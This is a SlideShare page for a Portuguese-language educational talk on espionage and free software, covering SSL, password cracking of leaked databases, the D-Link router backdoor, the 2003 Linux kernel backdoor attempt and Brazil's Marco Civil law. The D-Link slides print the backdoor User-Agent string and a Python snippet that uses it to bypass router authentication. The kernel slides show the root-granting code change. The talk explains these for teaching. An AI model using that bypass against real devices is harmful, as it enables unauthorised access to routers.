SlideShare uma empresa Scribd logo
1 de 40
Baixar para ler offline
Espionagem e Software Livre 
Endagamentos e conclus˜oes 
´Atila Camurc¸a 
September 13, 2014
Sumary 
1 Introduc¸˜ao 
2 Acesso seguro atrav´es da internet 
3 Hackers e Crackers 
Hackeando Google e Duck Duck Go 
T´ecnicas para quebrar senhas 
Vazamento de senhas ao Linkedin 
Engenharia reversa em firmware D-Link 
Ataque ao Kernel 
4 Marco Civil da Internet no Brasil
Sobre Mim 
Graduando em Ciˆencia da Computac¸˜ao pelo IFCE. 
7 anos de experiˆencia com Linux. 
Organizador do COMSOLiD a 6 anos.
Introduc¸˜ao 
Figure : Nicol´as Maduro e Dilma Rousseff
SSL 
Secure Socket Layer
Acesso seguro atrav´es da internet 
Para acessar a internet com seguranc¸a usamos o protocolo SSL junto 
com o HTTP. 
Figure : SSL do Gmail
Acesso seguro atrav´es da internet 
SSL ´e uma nova camada de protocolo que opera em cima do protocolo 
TCP. 
Permite ambas as m´aquina, cliente e servidor, estabelecer uma conex˜ao 
criptografada.
Acesso seguro atrav´es da internet 
Entretanto isso ´e uma especificac¸˜ao, ou seja, algu´em tem que 
implementar. Algumas empresas que o implementam: 
OpenSSL (http://www.openssl.org/) - Implementac¸˜ao livre e 
gratuita do SSL. 
Apache-SSL (http://www.apache-ssl.org/) - um servidor web 
seguro, baseado no OpenSSL. 
SSLeay 
(ftp://ftp.uni-mainz.de/pub/internet/security/ssl/SSL/) 
- uma implementac¸˜ao gratuita do Netscape’s Secure Socket Layer. 
Planet SSL (http: 
//www.rsasecurity.com/standards/ssl/developers.html) - 
provˆe SSL para programas em C e Java.
Acesso seguro atrav´es da internet 
Exemplo de mesma implementac¸˜ao para problemas diferentes: 
multiplicac¸˜ao de 2 n´umeros: 
2 * 3 
ou 
2 + 2 + 2
Software Livre ´e seguro?
Software Livre ´e seguro? 
Figure : C´odigos Compilados
Software Livre ´e seguro? 
Figure : C´odigos Interpretados
O qu˜ao ´e seguro uma 
criptografia usando SSL?
Levaria um tempo 
significativamente maior que a 
idade do universo para quebrar 
uma chave de 128-bits. 
Estima-se um pouco mais de 13 bilh˜oes de anos. 
Fonte: http://www.inet2000.com/public/encryption.htm 
http://www.digicert.com/TimeTravel/math.htm
Hackers e Crackers
Hackers e Crackers 
Crackers s˜ao pessoas que invadem computadores com prop´ositos 
criminais ou ganho pessoal. 
Enquanto Hackers podem ser especialistas em seguranc¸a contratados 
por empresas, com o objetivo de encontrar poss´ıveis vulnerabilidades e 
san´a-las.
Hackeando Google 
Hackear ´e uma coisa boa! Alguns sites permitem que isso seja feito de 
forma a otimizar processos, como fazer uma busca. Vejamos um 
exemplo com o Google quando fazemos a seguinte busca: 
comsolid filetype:pdf 
Al´em de buscar a palavra comsolid, ele busca apenas arquivos pdf.
Hackeando Google 
Ou ainda podemos fazer buscas em determinados sites somente. Basta 
fazer uma busca na forma: 
inkscape site:comsolid.org 
Essa busca pesquisa a palavra inkscape no site comsolid.org
Hackeando Duck Duck Go 
Duck Duck Go ´e um motor de busca preocupado com a pesquisa em si 
e sua privacidade. 
https://duckduckgo.com/ 
Possui parte de seu c´odigo livre, isso inclui plugins, add-ons, etc. P´agina 
do github: 
https://github.com/duckduckgo/
Hackeando Duck Duck Go 
Duck Duck Go permite hacks mais engenhosos. Vamos a eles: 
!g comsolid - busca comsolid no google 
expand http://va.mu/dIwg - mostra a URL original 
ip address - mostra seu enderec¸o IP 
github sige - mostra reposit´orios do github 
@comsolid - mostra usu´ario do Twitter 
age of linus torvalds - diz a idade 
define free software - define uma palavra ou frase 
weather in fortaleza - mostra a previs˜ao do tempo 
daft punk soundcloud - busca m´usicas no soundcloud
Hackeando Duck Duck Go 
Temos ainda o http://duckduckhack.com/ 
Figure : Duck Duck Hack
T´ecnicas para quebrar 
senhas
T´ecnicas para quebrar senhas 
A t´ecnica mais conhecida e natural ´e a forc¸a bruta, ou seja, tentar todas 
as combinac¸˜oes poss´ıveis at´e encontrar. Isso funciona at´e certo ponto, 
quando a entrada ´e pequena. 
Num artigo escrito por Dan Goodin no site http://arstechnica.com 
em que descreve como Kevin Young, um pesquisador de seguranc¸a de 
senhas, procedeu para descriptografar senhas vazadas pelo Antisec de 
uma empresa chamada Stratfor.
T´ecnicas para quebrar senhas 
Ap´os quebrar 60% das senhas usando listas de senhas dispon´ıveis em: 
Hashcat - http://hashcat.net/oclhashcat-plus/ 
John the Ripper - http://www.openwall.com/john/ 
Para os outros 40% ele ficou “sem palavras”, ent˜ao onde encontr´a-las? 
Que tal Wikipedia, Youtube, B´ıblia, Projeto Gutenberg?
T´ecnicas para quebrar senhas 
Uma das senhas era “crotalus atrox”, nome cient´ıfico de uma cobra. Tal 
senha foi quebrada grac¸as a esta p´agina da Wikipedia: 
https://en.wikipedia.org/wiki/Crotalus_atrox 
Em seguida outras senhas fortes por serem grandes foram encontradas 
como: 
“from genesis to revelations” (26) 
“I cant remember anything” (24) 
“thereisnofatebutwhatwemake” (26) 
“givemelibertyorgivemedeath” (26)
Vazamento de senhas ao Linkedin 
Em Junho de 2012 um usu´ario anˆonimo postou no site 
http://insidepro.com/ uma lista com 6.5 milh˜oes de hashs ´unicos 
referentes a senhas pedindo ajuda para recuper´a-las. 
Ap´os quebrar muitas das senhas descobriu-se que se tratava de um banco 
de senhas do site Linkedin. Essa descoberta foi poss´ıvel pelo n´umero de 
senhas com a palavra linkedin.
Vazamento de senhas ao Linkedin 
Na lista existiam: 
1 - linkedin (4408) 
2 - link (2638) 
3 - linked (2135) 
Outras senhas encontradas: 
8 - love (1018) 
11 - password (856) 
16 - abc (750) 
Mais informac¸˜oes em: http: 
//www.ma.rhul.ac.uk/static/techrep/2013/MA-2013-07.pdf
Engenharia reversa em firmware D-Link 
Todos sabemos que a D-Link ´e especializada em fazer roteadores, e eles 
s˜ao um bom local para backdoors. E isso foi exatamente que Craig 
Heffner autor no blog http://www.devttys0.com encontrou. 
Ele encontrou a partir de uma engenharia reversa no firmware de uma 
dos roteadores.
Engenharia reversa em firmware D-Link 
Ap´os notar que certa func¸˜ao chamada alpha auth check soava 
suspeita, ele foi saber o que exatamente ela fazia. Ap´os um tempo ele 
chegou no seguinte trecho de c´odigo: 
int alpha_auth_check(struct http_request_t *request) { 
if(strstr(request->url, "graphic/") || 
strstr(request->url, "public/") || 
strcmp(request->user_agent, 
"xmlset_roodkcableoj28840ybtide") == 0) { 
return AUTH_OK; 
} else { 
if(check_login(request->0xC, request->0xE0) != 0) { 
return AUTH_OK; 
} 
} 
return AUTH_FAIL; 
}
Engenharia reversa em firmware D-Link 
Baseado no c´odigo fonte das p´aginas HTML e outros detalhes ´e sensato 
concluir que os seguintes modelos s˜ao afetados: 
DIR-100 
DIR-120 
DI-624S 
DI-524UP 
DI-604S 
DI-604UP 
DI-604+ 
TM-G5240
Engenharia reversa em firmware D-Link 
Quem quiser fazer um teste real existe um c´odigo em Python escrito pelo 
pr´oprio Craig e pode ser encontrado em: 
http://pastebin.com/vbiG42VD 
# Normally only admins can access the tools_misc.xgi page; 
# use the backdoor user-agent to bypass authentication 
import urllib2 
# ... 
req = urllib2.Request(url+buf, 
headers={ 
’User-Agent’: ’xmlset_roodkcableoj28840ybtide’ 
}) 
urllib2.urlopen(req)
Ataque ao Kernel
Ataque ao Kernel 
http://linux.slashdot.org/story/13/10/09/1551240/ 
the-linux-backdoor-attempt-of-2003 
Em 2003, houve uma tentativa de backdoor no Kernel do Linux. 
/* ... */ 
if ((options == (__WCLONE|__WALL)) 
&& (current->uid = 0)) 
retval = -EINVAL; 
/* ... */ 
Bastava chamar a func¸˜ao wait4 e vocˆe viraria root.
Ataque ao Kernel 
Comparemos os c´odigos original e o backdoor, e vejam se encontram a 
diferenc¸a. 
/* ... */ 
if ((options == (__WCLONE|__WALL)) 
&& (current->uid == 0)) 
retval = -EINVAL; 
/* ... */ 
/* ... */ 
if ((options == (__WCLONE|__WALL)) 
&& (current->uid = 0)) 
retval = -EINVAL; 
/* ... */
Marco Civil da Internet no Brasil 
O que ´e Marco Civil? 
´E 
um projeto de Lei que visa estabelecer direitos e deveres na utilizac¸˜ao 
da Internet no Brasil. ´E 
a constituic¸˜ao da Internet no pa´ıs.
Quais s˜ao os direitos e deveres? 
Neutralidade: pro´ıbe que provedores de internet discriminem certos 
servic¸os em detrimento de outros. 
Armazenamento de dados: Operac¸˜ao de coleta de dados no Brasil 
deve respeitar a privacidade, protec¸˜ao dos dados e sigilo das 
comunicac¸˜oes privadas. 
Retirada de conte´udo: entidades que oferecem conte´udo e 
aplicac¸˜oes s´o ser˜ao responsabilizadas por danos gerados por terceiros 
se n˜ao acatarem ordem judicial exigindo a retirada dessas 
publicac¸˜oes.
Quais s˜ao os direitos e deveres? 
Fim do marketing dirigido: as empresas de acesso n˜ao poder˜ao 
“espiar” o conte´udo das informac¸˜oes trocadas pelos usu´arios na 
rede. H´a interesse em fazer isso com fins comerciais, como para 
publicidade. 
Sigilo e privacidade: Provedores de acesso `a internet ser˜ao 
obrigados a guardar os registros das horas de acesso e do fim da 
conex˜ao dos usu´arios pelo prazo de seis meses, mas isso deve ser 
feito em ambiente controlado. 
Para mais detalhes: 
http://www.molon1313.com.br/marco-civil-da-internet/
Onde encontrar essa palestra? 
Vocˆe pode baixar essa palestra e ainda outras em: 
http://sige.comsolid.org/u/atilacamurca
D´uvidas?
Conecte-se 
E-mail: 
camurca.home@gmail.com 
Twitter: 
http://twitter.com/#!/atilacamurca 
Blog MAD3 Linux: 
http://www.mad3linux.org 
COMSOLiD: 
http://comsolid.org/ 
http://twitter.com/#!/comsolid 
https://www.facebook.com/comsolid 
Github: 
https://www.github.com/atilacamurca

Mais conteúdo relacionado

Destaque

Curso de css3 unidade 1 - introdução ao css
Curso de css3   unidade 1 - introdução ao cssCurso de css3   unidade 1 - introdução ao css
Curso de css3 unidade 1 - introdução ao css
Léo Dias
 

Destaque (20)

Certificacoes Desenvolvedores
Certificacoes DesenvolvedoresCertificacoes Desenvolvedores
Certificacoes Desenvolvedores
 
HTML5 & CSS3 - A Evolução da Web
HTML5 & CSS3 - A Evolução da WebHTML5 & CSS3 - A Evolução da Web
HTML5 & CSS3 - A Evolução da Web
 
Curso de css3 unidade 1 - introdução ao css
Curso de css3   unidade 1 - introdução ao cssCurso de css3   unidade 1 - introdução ao css
Curso de css3 unidade 1 - introdução ao css
 
Web e HTML5
Web e HTML5Web e HTML5
Web e HTML5
 
Html5 Aula 6
Html5 Aula 6Html5 Aula 6
Html5 Aula 6
 
HTML5, JAVASCRIPT E JQUERY
HTML5, JAVASCRIPT E JQUERYHTML5, JAVASCRIPT E JQUERY
HTML5, JAVASCRIPT E JQUERY
 
Html5 Aula 3
Html5 Aula 3Html5 Aula 3
Html5 Aula 3
 
Html5 aula 02
Html5 aula 02Html5 aula 02
Html5 aula 02
 
javscript para iniciantes
javscript para iniciantesjavscript para iniciantes
javscript para iniciantes
 
Campanhas Inovadoras e Criativas na Web
Campanhas Inovadoras e Criativas na WebCampanhas Inovadoras e Criativas na Web
Campanhas Inovadoras e Criativas na Web
 
Redes linux excerto
Redes linux excertoRedes linux excerto
Redes linux excerto
 
10 Java Script - Exemplos práticos
10 Java Script - Exemplos práticos10 Java Script - Exemplos práticos
10 Java Script - Exemplos práticos
 
JavaScript Robotics: o que acontece quando o hardware se encontra com o JavaS...
JavaScript Robotics: o que acontece quando o hardware se encontra com o JavaS...JavaScript Robotics: o que acontece quando o hardware se encontra com o JavaS...
JavaScript Robotics: o que acontece quando o hardware se encontra com o JavaS...
 
Html5 aula 01
Html5 aula 01Html5 aula 01
Html5 aula 01
 
Introdução ao CSS - Desenvolvimento web
Introdução ao CSS - Desenvolvimento webIntrodução ao CSS - Desenvolvimento web
Introdução ao CSS - Desenvolvimento web
 
Curso de desenvolvimento de aplicações para iOS com Objective-C
Curso de desenvolvimento de aplicações para iOS com Objective-CCurso de desenvolvimento de aplicações para iOS com Objective-C
Curso de desenvolvimento de aplicações para iOS com Objective-C
 
Introdução básica ao JavaScript
Introdução básica ao JavaScriptIntrodução básica ao JavaScript
Introdução básica ao JavaScript
 
Introdução ao JavaScript
Introdução ao JavaScriptIntrodução ao JavaScript
Introdução ao JavaScript
 
Certificacao Php
Certificacao PhpCertificacao Php
Certificacao Php
 
Curso de HTML5 - Aula 01
Curso de HTML5 - Aula 01   Curso de HTML5 - Aula 01
Curso de HTML5 - Aula 01
 

Semelhante a Espionagem e Software Livre

Direito na Internet
Direito na InternetDireito na Internet
Direito na Internet
renatofrigo
 
Introducao a criptografia
Introducao a criptografiaIntroducao a criptografia
Introducao a criptografia
gillojau
 
Apresentação tema 9 Segurança das Informações e Continuidade dos negócios
Apresentação tema 9 Segurança das Informações e Continuidade dos negóciosApresentação tema 9 Segurança das Informações e Continuidade dos negócios
Apresentação tema 9 Segurança das Informações e Continuidade dos negócios
Sanger Dias
 

Semelhante a Espionagem e Software Livre (20)

Pentest conisli07
Pentest conisli07Pentest conisli07
Pentest conisli07
 
Tema 09
Tema 09Tema 09
Tema 09
 
3º SICT-Sul Minicurso Técnicas para segurança computacional
3º SICT-Sul Minicurso Técnicas para segurança computacional3º SICT-Sul Minicurso Técnicas para segurança computacional
3º SICT-Sul Minicurso Técnicas para segurança computacional
 
Fundamentos de Segurança da Informação
Fundamentos de Segurança da InformaçãoFundamentos de Segurança da Informação
Fundamentos de Segurança da Informação
 
Seguranca da informação simulado respondido (1)
Seguranca da informação   simulado respondido (1)Seguranca da informação   simulado respondido (1)
Seguranca da informação simulado respondido (1)
 
XSS Desvendado
XSS DesvendadoXSS Desvendado
XSS Desvendado
 
Trabalho anonimato tutorial
Trabalho anonimato tutorialTrabalho anonimato tutorial
Trabalho anonimato tutorial
 
Como funcionam as ameaças da internet e o cybercrime
Como funcionam as ameaças da internet e o cybercrimeComo funcionam as ameaças da internet e o cybercrime
Como funcionam as ameaças da internet e o cybercrime
 
Direito na Internet
Direito na InternetDireito na Internet
Direito na Internet
 
Direito na-internet
Direito na-internetDireito na-internet
Direito na-internet
 
Análise de vulnerabilidades em ativos de ti
Análise de vulnerabilidades em ativos de tiAnálise de vulnerabilidades em ativos de ti
Análise de vulnerabilidades em ativos de ti
 
Introducao a criptografia
Introducao a criptografiaIntroducao a criptografia
Introducao a criptografia
 
Introdução à Segurança da Informação
Introdução à Segurança da InformaçãoIntrodução à Segurança da Informação
Introdução à Segurança da Informação
 
Phishing - CAPTURANDO SENHAS DO FACEBOOK COM O XPLOITV.NET
Phishing - CAPTURANDO SENHAS DO FACEBOOK COM O XPLOITV.NETPhishing - CAPTURANDO SENHAS DO FACEBOOK COM O XPLOITV.NET
Phishing - CAPTURANDO SENHAS DO FACEBOOK COM O XPLOITV.NET
 
Segurança da Internet
Segurança da InternetSegurança da Internet
Segurança da Internet
 
Segurança na-internet-precioso-clique
Segurança na-internet-precioso-cliqueSegurança na-internet-precioso-clique
Segurança na-internet-precioso-clique
 
Segurança de redes
Segurança de redesSegurança de redes
Segurança de redes
 
Apresentação tema 9 Segurança das Informações e Continuidade dos negócios
Apresentação tema 9 Segurança das Informações e Continuidade dos negóciosApresentação tema 9 Segurança das Informações e Continuidade dos negócios
Apresentação tema 9 Segurança das Informações e Continuidade dos negócios
 
Palestra Evolução e Perigos da Internet
Palestra Evolução e Perigos da InternetPalestra Evolução e Perigos da Internet
Palestra Evolução e Perigos da Internet
 
Conscientização sobre SI
Conscientização sobre SIConscientização sobre SI
Conscientização sobre SI
 

Mais de Átila Camurça

Onde o Software Livre pode te levar - Uma viagem ao mundo livre
Onde o Software Livre pode te levar - Uma viagem ao mundo livreOnde o Software Livre pode te levar - Uma viagem ao mundo livre
Onde o Software Livre pode te levar - Uma viagem ao mundo livre
Átila Camurça
 
Guia Aberto Android ed.2
Guia Aberto Android ed.2Guia Aberto Android ed.2
Guia Aberto Android ed.2
Átila Camurça
 

Mais de Átila Camurça (12)

Ciência e Informática
Ciência e InformáticaCiência e Informática
Ciência e Informática
 
Software Livre: Além da filosofia
Software Livre: Além da filosofiaSoftware Livre: Além da filosofia
Software Livre: Além da filosofia
 
Ubuntu COMSOLiD 6
Ubuntu COMSOLiD 6Ubuntu COMSOLiD 6
Ubuntu COMSOLiD 6
 
Árvores B
Árvores BÁrvores B
Árvores B
 
NodeJS - E/S não-bloqueante - Dirigido a Eventos
NodeJS - E/S não-bloqueante - Dirigido a EventosNodeJS - E/S não-bloqueante - Dirigido a Eventos
NodeJS - E/S não-bloqueante - Dirigido a Eventos
 
Onde o Software Livre pode te levar - Uma viagem ao mundo livre
Onde o Software Livre pode te levar - Uma viagem ao mundo livreOnde o Software Livre pode te levar - Uma viagem ao mundo livre
Onde o Software Livre pode te levar - Uma viagem ao mundo livre
 
Guia Aberto Android ed.2
Guia Aberto Android ed.2Guia Aberto Android ed.2
Guia Aberto Android ed.2
 
Ubuntu COMSOLiD 5
Ubuntu COMSOLiD 5Ubuntu COMSOLiD 5
Ubuntu COMSOLiD 5
 
Tradução de Aplicativos Livres
Tradução de Aplicativos LivresTradução de Aplicativos Livres
Tradução de Aplicativos Livres
 
Linux - Customização e Repositórios Off-line
Linux - Customização e Repositórios Off-lineLinux - Customização e Repositórios Off-line
Linux - Customização e Repositórios Off-line
 
Linux - Instalação de Programas
Linux - Instalação de ProgramasLinux - Instalação de Programas
Linux - Instalação de Programas
 
Aplicativos - Ubuntu COMSOLiD
Aplicativos - Ubuntu COMSOLiDAplicativos - Ubuntu COMSOLiD
Aplicativos - Ubuntu COMSOLiD
 

Espionagem e Software Livre

  • 1. Espionagem e Software Livre Endagamentos e conclus˜oes ´Atila Camurc¸a September 13, 2014
  • 2. Sumary 1 Introduc¸˜ao 2 Acesso seguro atrav´es da internet 3 Hackers e Crackers Hackeando Google e Duck Duck Go T´ecnicas para quebrar senhas Vazamento de senhas ao Linkedin Engenharia reversa em firmware D-Link Ataque ao Kernel 4 Marco Civil da Internet no Brasil
  • 3. Sobre Mim Graduando em Ciˆencia da Computac¸˜ao pelo IFCE. 7 anos de experiˆencia com Linux. Organizador do COMSOLiD a 6 anos.
  • 4. Introduc¸˜ao Figure : Nicol´as Maduro e Dilma Rousseff
  • 6. Acesso seguro atrav´es da internet Para acessar a internet com seguranc¸a usamos o protocolo SSL junto com o HTTP. Figure : SSL do Gmail
  • 7. Acesso seguro atrav´es da internet SSL ´e uma nova camada de protocolo que opera em cima do protocolo TCP. Permite ambas as m´aquina, cliente e servidor, estabelecer uma conex˜ao criptografada.
  • 8. Acesso seguro atrav´es da internet Entretanto isso ´e uma especificac¸˜ao, ou seja, algu´em tem que implementar. Algumas empresas que o implementam: OpenSSL (http://www.openssl.org/) - Implementac¸˜ao livre e gratuita do SSL. Apache-SSL (http://www.apache-ssl.org/) - um servidor web seguro, baseado no OpenSSL. SSLeay (ftp://ftp.uni-mainz.de/pub/internet/security/ssl/SSL/) - uma implementac¸˜ao gratuita do Netscape’s Secure Socket Layer. Planet SSL (http: //www.rsasecurity.com/standards/ssl/developers.html) - provˆe SSL para programas em C e Java.
  • 9. Acesso seguro atrav´es da internet Exemplo de mesma implementac¸˜ao para problemas diferentes: multiplicac¸˜ao de 2 n´umeros: 2 * 3 ou 2 + 2 + 2
  • 11. Software Livre ´e seguro? Figure : C´odigos Compilados
  • 12. Software Livre ´e seguro? Figure : C´odigos Interpretados
  • 13. O qu˜ao ´e seguro uma criptografia usando SSL?
  • 14. Levaria um tempo significativamente maior que a idade do universo para quebrar uma chave de 128-bits. Estima-se um pouco mais de 13 bilh˜oes de anos. Fonte: http://www.inet2000.com/public/encryption.htm http://www.digicert.com/TimeTravel/math.htm
  • 16. Hackers e Crackers Crackers s˜ao pessoas que invadem computadores com prop´ositos criminais ou ganho pessoal. Enquanto Hackers podem ser especialistas em seguranc¸a contratados por empresas, com o objetivo de encontrar poss´ıveis vulnerabilidades e san´a-las.
  • 17. Hackeando Google Hackear ´e uma coisa boa! Alguns sites permitem que isso seja feito de forma a otimizar processos, como fazer uma busca. Vejamos um exemplo com o Google quando fazemos a seguinte busca: comsolid filetype:pdf Al´em de buscar a palavra comsolid, ele busca apenas arquivos pdf.
  • 18. Hackeando Google Ou ainda podemos fazer buscas em determinados sites somente. Basta fazer uma busca na forma: inkscape site:comsolid.org Essa busca pesquisa a palavra inkscape no site comsolid.org
  • 19. Hackeando Duck Duck Go Duck Duck Go ´e um motor de busca preocupado com a pesquisa em si e sua privacidade. https://duckduckgo.com/ Possui parte de seu c´odigo livre, isso inclui plugins, add-ons, etc. P´agina do github: https://github.com/duckduckgo/
  • 20. Hackeando Duck Duck Go Duck Duck Go permite hacks mais engenhosos. Vamos a eles: !g comsolid - busca comsolid no google expand http://va.mu/dIwg - mostra a URL original ip address - mostra seu enderec¸o IP github sige - mostra reposit´orios do github @comsolid - mostra usu´ario do Twitter age of linus torvalds - diz a idade define free software - define uma palavra ou frase weather in fortaleza - mostra a previs˜ao do tempo daft punk soundcloud - busca m´usicas no soundcloud
  • 21. Hackeando Duck Duck Go Temos ainda o http://duckduckhack.com/ Figure : Duck Duck Hack
  • 23. T´ecnicas para quebrar senhas A t´ecnica mais conhecida e natural ´e a forc¸a bruta, ou seja, tentar todas as combinac¸˜oes poss´ıveis at´e encontrar. Isso funciona at´e certo ponto, quando a entrada ´e pequena. Num artigo escrito por Dan Goodin no site http://arstechnica.com em que descreve como Kevin Young, um pesquisador de seguranc¸a de senhas, procedeu para descriptografar senhas vazadas pelo Antisec de uma empresa chamada Stratfor.
  • 24. T´ecnicas para quebrar senhas Ap´os quebrar 60% das senhas usando listas de senhas dispon´ıveis em: Hashcat - http://hashcat.net/oclhashcat-plus/ John the Ripper - http://www.openwall.com/john/ Para os outros 40% ele ficou “sem palavras”, ent˜ao onde encontr´a-las? Que tal Wikipedia, Youtube, B´ıblia, Projeto Gutenberg?
  • 25. T´ecnicas para quebrar senhas Uma das senhas era “crotalus atrox”, nome cient´ıfico de uma cobra. Tal senha foi quebrada grac¸as a esta p´agina da Wikipedia: https://en.wikipedia.org/wiki/Crotalus_atrox Em seguida outras senhas fortes por serem grandes foram encontradas como: “from genesis to revelations” (26) “I cant remember anything” (24) “thereisnofatebutwhatwemake” (26) “givemelibertyorgivemedeath” (26)
  • 26. Vazamento de senhas ao Linkedin Em Junho de 2012 um usu´ario anˆonimo postou no site http://insidepro.com/ uma lista com 6.5 milh˜oes de hashs ´unicos referentes a senhas pedindo ajuda para recuper´a-las. Ap´os quebrar muitas das senhas descobriu-se que se tratava de um banco de senhas do site Linkedin. Essa descoberta foi poss´ıvel pelo n´umero de senhas com a palavra linkedin.
  • 27. Vazamento de senhas ao Linkedin Na lista existiam: 1 - linkedin (4408) 2 - link (2638) 3 - linked (2135) Outras senhas encontradas: 8 - love (1018) 11 - password (856) 16 - abc (750) Mais informac¸˜oes em: http: //www.ma.rhul.ac.uk/static/techrep/2013/MA-2013-07.pdf
  • 28. Engenharia reversa em firmware D-Link Todos sabemos que a D-Link ´e especializada em fazer roteadores, e eles s˜ao um bom local para backdoors. E isso foi exatamente que Craig Heffner autor no blog http://www.devttys0.com encontrou. Ele encontrou a partir de uma engenharia reversa no firmware de uma dos roteadores.
  • 29. Engenharia reversa em firmware D-Link Ap´os notar que certa func¸˜ao chamada alpha auth check soava suspeita, ele foi saber o que exatamente ela fazia. Ap´os um tempo ele chegou no seguinte trecho de c´odigo: int alpha_auth_check(struct http_request_t *request) { if(strstr(request->url, "graphic/") || strstr(request->url, "public/") || strcmp(request->user_agent, "xmlset_roodkcableoj28840ybtide") == 0) { return AUTH_OK; } else { if(check_login(request->0xC, request->0xE0) != 0) { return AUTH_OK; } } return AUTH_FAIL; }
  • 30. Engenharia reversa em firmware D-Link Baseado no c´odigo fonte das p´aginas HTML e outros detalhes ´e sensato concluir que os seguintes modelos s˜ao afetados: DIR-100 DIR-120 DI-624S DI-524UP DI-604S DI-604UP DI-604+ TM-G5240
  • 31. Engenharia reversa em firmware D-Link Quem quiser fazer um teste real existe um c´odigo em Python escrito pelo pr´oprio Craig e pode ser encontrado em: http://pastebin.com/vbiG42VD # Normally only admins can access the tools_misc.xgi page; # use the backdoor user-agent to bypass authentication import urllib2 # ... req = urllib2.Request(url+buf, headers={ ’User-Agent’: ’xmlset_roodkcableoj28840ybtide’ }) urllib2.urlopen(req)
  • 33. Ataque ao Kernel http://linux.slashdot.org/story/13/10/09/1551240/ the-linux-backdoor-attempt-of-2003 Em 2003, houve uma tentativa de backdoor no Kernel do Linux. /* ... */ if ((options == (__WCLONE|__WALL)) && (current->uid = 0)) retval = -EINVAL; /* ... */ Bastava chamar a func¸˜ao wait4 e vocˆe viraria root.
  • 34. Ataque ao Kernel Comparemos os c´odigos original e o backdoor, e vejam se encontram a diferenc¸a. /* ... */ if ((options == (__WCLONE|__WALL)) && (current->uid == 0)) retval = -EINVAL; /* ... */ /* ... */ if ((options == (__WCLONE|__WALL)) && (current->uid = 0)) retval = -EINVAL; /* ... */
  • 35. Marco Civil da Internet no Brasil O que ´e Marco Civil? ´E um projeto de Lei que visa estabelecer direitos e deveres na utilizac¸˜ao da Internet no Brasil. ´E a constituic¸˜ao da Internet no pa´ıs.
  • 36. Quais s˜ao os direitos e deveres? Neutralidade: pro´ıbe que provedores de internet discriminem certos servic¸os em detrimento de outros. Armazenamento de dados: Operac¸˜ao de coleta de dados no Brasil deve respeitar a privacidade, protec¸˜ao dos dados e sigilo das comunicac¸˜oes privadas. Retirada de conte´udo: entidades que oferecem conte´udo e aplicac¸˜oes s´o ser˜ao responsabilizadas por danos gerados por terceiros se n˜ao acatarem ordem judicial exigindo a retirada dessas publicac¸˜oes.
  • 37. Quais s˜ao os direitos e deveres? Fim do marketing dirigido: as empresas de acesso n˜ao poder˜ao “espiar” o conte´udo das informac¸˜oes trocadas pelos usu´arios na rede. H´a interesse em fazer isso com fins comerciais, como para publicidade. Sigilo e privacidade: Provedores de acesso `a internet ser˜ao obrigados a guardar os registros das horas de acesso e do fim da conex˜ao dos usu´arios pelo prazo de seis meses, mas isso deve ser feito em ambiente controlado. Para mais detalhes: http://www.molon1313.com.br/marco-civil-da-internet/
  • 38. Onde encontrar essa palestra? Vocˆe pode baixar essa palestra e ainda outras em: http://sige.comsolid.org/u/atilacamurca
  • 40. Conecte-se E-mail: camurca.home@gmail.com Twitter: http://twitter.com/#!/atilacamurca Blog MAD3 Linux: http://www.mad3linux.org COMSOLiD: http://comsolid.org/ http://twitter.com/#!/comsolid https://www.facebook.com/comsolid Github: https://www.github.com/atilacamurca